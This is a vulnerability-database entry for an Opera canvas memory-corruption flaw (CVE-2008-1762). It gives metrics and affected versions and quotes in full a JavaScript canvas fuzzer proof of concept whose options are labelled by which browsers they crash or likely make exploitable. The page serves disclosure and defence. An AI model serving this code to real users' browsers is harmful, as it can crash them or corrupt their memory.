CVE-2008-1762 : Detail

CVE-2008-1762

11.9%V3
Network
2008-04-12
18h00 +00:00
2017-08-07
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Opera before 9.27 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted scaled image pattern in an HTML CANVAS element, which triggers memory corruption.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 31594

Publication date : 2008-04-02 22h00 +00:00
Author : Michal Zalewski
EDB Verified : Yes

source: https://www.securityfocus.com/bid/28585/info Opera Web Browser is prone to multiple security vulnerabilities that may allow remote attackers to execute code. These issues lead to memory corruption and may result in remote unauthorized access and denial-of-service attacks. Versions prior to Opera 9.27 are vulnerable. <body> <font face="arial,helvetica"> <font size=+3><code><CANVAS></code> fuzzer</font><font size=-1> by <a href="mailto:[email protected]">[email protected]</a></font><p> <div id=ccont> <canvas id=canvas height=200 width=300 style="border: 1px solid teal"></canvas> </div> <img id=image src="envelope.gif" align=top> <p> <input type=checkbox id=dealloc> Deallocate canvas after every cycle (NULL ptr in Safari, likely exploitable in Opera)<br> <input type=checkbox id=keep_ctx> Keep context (if combined with above, NULL ptr Firefox, likely exploitable in Opera)<br> <input type=checkbox id=scale_large> Use large canvas scaling (likely exploitable in Opera, bogs down Firefox)<br> <input type=checkbox id=return_undef> Return <code>undefined</code> values (NULL ptr Safari, may hang Opera)<br> <input type=checkbox id=return_large> Return large integers (exploitable crash in Safari, OOM/DoS elsewhere)<br> <input type=checkbox id=quick> Skip time-consuming operations (quicker, but may miss issues)<p> <input type=submit value="Begin tests" id=button onclick="setup_all()"><p> <script> var ctx; /* Canvas context */ var imgObj; /* Reference image */ var scval = 1; var transval = 0; var quick; var dealloc; var return_undef; var return_large; var scale_large; var keep_ctx; var iht; function setup_all() { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); imgObj = document.getElementById('image'); iht = document.getElementById('ccont').innerHTML; quick = document.getElementById('quick').checked; dealloc = document.getElementById('dealloc').checked; return_undef = document.getElementById('return_undef').checked; return_large = document.getElementById('return_large').checked; scale_large = document.getElementById('scale_large').checked; keep_ctx = document.getElementById('keep_ctx').checked; document.getElementById('button').disabled = true; setInterval('do_fuzz();',1); } function R(x) { return Math.floor(Math.random() * x); } function make_number() { var v; var sel; if (return_large == true && R(3) == 1) sel = R(6); else sel = R(4); if (return_undef == false && sel == 0) sel = 1; if (R(2) == 1) v = R(100); else switch (sel) { case 0: break; case 1: v = 0; break; case 2: v = 0.000001; break; case 3: v = 10000; break; case 4: v = 2000000000; break; case 5: v = 1e100; break; } if (R(4) == 1) v = -v; return v; } function make_color() { if (R(2) == 1) return "#C0F0A0"; else return "#000090"; } function make_fill() { var sel; if (quick == true) sel = 0; else sel = R(6); switch (sel) { case 0: case 1: case 2: return make_color(); break; case 3: var r = ctx.createLinearGradient(make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 4: var r = ctx.createRadialGradient(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 5: var r = ctx.createPattern(imgObj,"repeat"); if (R(6) == 0) r.addColorStop(make_number(),make_color()); return r; break; } } function do_fuzz() { if (dealloc == true) document.getElementById('ccont').innerHTML = iht; if (keep_ctx == false) { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); } for (i=0;i<100;i++) { try { switch (R(33)) { case 0: ctx.fillStyle = make_fill(); break; case 1: ctx.globalAlpha = Math.random() - .5; break; case 2: switch (R(3)) { case 0: ctx.globalCompositeOperation = 'copy'; break; case 1: ctx.globalCompositeOperation = 'xor'; break; case 2: ctx.globalCompositeOperation = 'source-over'; break; } break; case 3: switch (R(2)) { case 0: ctx.lineCap = 'round'; break; case 1: ctx.lineCap = 'butt'; break; } break; case 4: switch (R(2)) { case 0: ctx.lineJoin = 'round'; break; case 1: ctx.lineJoin = 'miter'; break; } break; case 5: ctx.lineWidth = make_number(); break; case 6: ctx.miterLimit = make_number(); break; case 7: if (quick == true) break; ctx.shadowBlur = make_number(); break; case 8: if (quick == true) break; ctx.shadowColor = make_fill(); break; case 9: if (quick == true) break; ctx.shadowOffsetX = make_number(); ctx.shadowOffsetY = make_number(); break; case 10: ctx.restore(); break; case 11: ctx.rotate(make_number()); break; case 12: ctx.save(); break; case 13: ctx.scale(-1,-1); break; case 14: if (quick == true) break; if (transval == 0) { transval = make_number(); ctx.translate(transval,0); } else { ctx.translate(-transval,0); transval = 0; } break; case 15: ctx.clearRect(make_number(),make_number(),make_number(),make_number()); break; case 16: if (quick == true) break; ctx.drawImage(imgObj,make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 17: ctx.fillRect(make_number(),make_number(),make_number(),make_number()); break; case 18: ctx.beginPath(); break; case 19: // ctx.clip() is evil. break; case 20: ctx.closePath(); break; case 21: ctx.fill(); break; case 22: ctx.stroke(); break; case 23: ctx.strokeRect(make_number(),make_number(),make_number(),make_number()); break; case 24: if (quick == true) break; ctx.arc(make_number(),make_number(),make_number(),make_number(),make_number(),true); break; case 25: if (quick == true) break; ctx.arcTo(make_number(),make_number(),make_number(),make_number(),make_number()); break; case 26: if (quick == true) break; ctx.bezierCurveTo(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 27: ctx.lineTo(make_number(),make_number()); break; case 28: ctx.moveTo(make_number(),make_number()); break; case 29: if (quick == true) break; ctx.quadraticCurveTo(make_number(),make_number(),make_number(),make_number()); break; case 30: if (quick == true) break; ctx.transform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 31: if (quick == true) break; ctx.setTransform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 32: if (scale_large == true) { switch (scval) { case 0: ctx.scale(-1000000000,1); ctx.scale(-1000000000,1); scval = 1; break; case 1: ctx.scale(-.000000001,1); scval = 2; break; case 1: ctx.scale(-.000000001,1); scval = 0; break; } } break; } } catch (e) { } } } </script>

Products Mentioned

Configuraton 0

Opera>>Opera_browser >> Version To (including) 9.26

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.0

Opera>>Opera_browser >> Version 5.02

Opera>>Opera_browser >> Version 5.10

Opera>>Opera_browser >> Version 5.11

Opera>>Opera_browser >> Version 5.12

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.0

Opera>>Opera_browser >> Version 6.1

Opera>>Opera_browser >> Version 6.01

Opera>>Opera_browser >> Version 6.1

Opera>>Opera_browser >> Version 6.02

Opera>>Opera_browser >> Version 6.03

Opera>>Opera_browser >> Version 6.04

Opera>>Opera_browser >> Version 6.05

Opera>>Opera_browser >> Version 6.06

Opera>>Opera_browser >> Version 6.11

Opera>>Opera_browser >> Version 6.12

Opera>>Opera_browser >> Version 7.0

Opera>>Opera_browser >> Version 7.0

Opera>>Opera_browser >> Version 7.0

Opera>>Opera_browser >> Version 7.0

Opera>>Opera_browser >> Version 7.01

Opera>>Opera_browser >> Version 7.02

Opera>>Opera_browser >> Version 7.03

Opera>>Opera_browser >> Version 7.10

Opera>>Opera_browser >> Version 7.10

Opera>>Opera_browser >> Version 7.11

Opera>>Opera_browser >> Version 7.11

Opera>>Opera_browser >> Version 7.20

Opera>>Opera_browser >> Version 7.20

Opera>>Opera_browser >> Version 7.21

Opera>>Opera_browser >> Version 7.22

Opera>>Opera_browser >> Version 7.23

Opera>>Opera_browser >> Version 7.50

Opera>>Opera_browser >> Version 7.50

Opera>>Opera_browser >> Version 7.51

Opera>>Opera_browser >> Version 7.52

Opera>>Opera_browser >> Version 7.53

Opera>>Opera_browser >> Version 7.54

Opera>>Opera_browser >> Version 7.54

Opera>>Opera_browser >> Version 7.54

Opera>>Opera_browser >> Version 7.60

Opera>>Opera_browser >> Version 8.0

Opera>>Opera_browser >> Version 8.0

Opera>>Opera_browser >> Version 8.0

Opera>>Opera_browser >> Version 8.0

Opera>>Opera_browser >> Version 8.01

Opera>>Opera_browser >> Version 8.02

Opera>>Opera_browser >> Version 8.50

Opera>>Opera_browser >> Version 8.51

Opera>>Opera_browser >> Version 8.52

Opera>>Opera_browser >> Version 8.53

Opera>>Opera_browser >> Version 8.54

Opera>>Opera_browser >> Version 9.0

Opera>>Opera_browser >> Version 9.0

Opera>>Opera_browser >> Version 9.0

Opera>>Opera_browser >> Version 9.01

Opera>>Opera_browser >> Version 9.02

Opera>>Opera_browser >> Version 9.10

Opera>>Opera_browser >> Version 9.12

Opera>>Opera_browser >> Version 9.20

Opera>>Opera_browser >> Version 9.20

Opera>>Opera_browser >> Version 9.21

Opera>>Opera_browser >> Version 9.22

Opera>>Opera_browser >> Version 9.23

Opera>>Opera_browser >> Version 9.24

Opera>>Opera_browser >> Version 9.25

References

http://www.securityfocus.com/bid/28585
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/29679
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29735
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29662
Tags : third-party-advisory, x_refsource_SECUNIA
http://security.gentoo.org/glsa/glsa-200804-14.xml
Tags : vendor-advisory, x_refsource_GENTOO